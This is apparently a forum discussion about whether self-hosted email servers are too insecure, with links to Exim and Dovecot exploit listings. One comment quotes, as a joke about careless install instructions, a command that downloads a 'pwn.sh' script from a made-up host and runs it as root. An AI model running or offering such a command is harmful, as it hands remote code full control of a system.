Recent Exim exploit: http://www.exploit-db.com/exploits/25970/
Dovecot exploit: https://www.rapid7.com/db/modules/exploit/linux/smtp/exim4_d...
I found a few Sendmail exploits as well but nothing from this year. Sure this stuff is easy to install but there is a reason managed email exists.
https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...
By that metric all software on your servers are insecure (consider the number of "just do: 'wget http://trollol.com/pwn.sh|sudo bash -'"-type advice you find looking at install-instruction for random github projects).
I really don't know what the deal is with email, but since the mid 90s there's been this weird thing where everyone wants to follow some kind of step by step guide. But it is just simple software like anything else. If you can setup a webserver or a database server or anything else you can setup a mail server.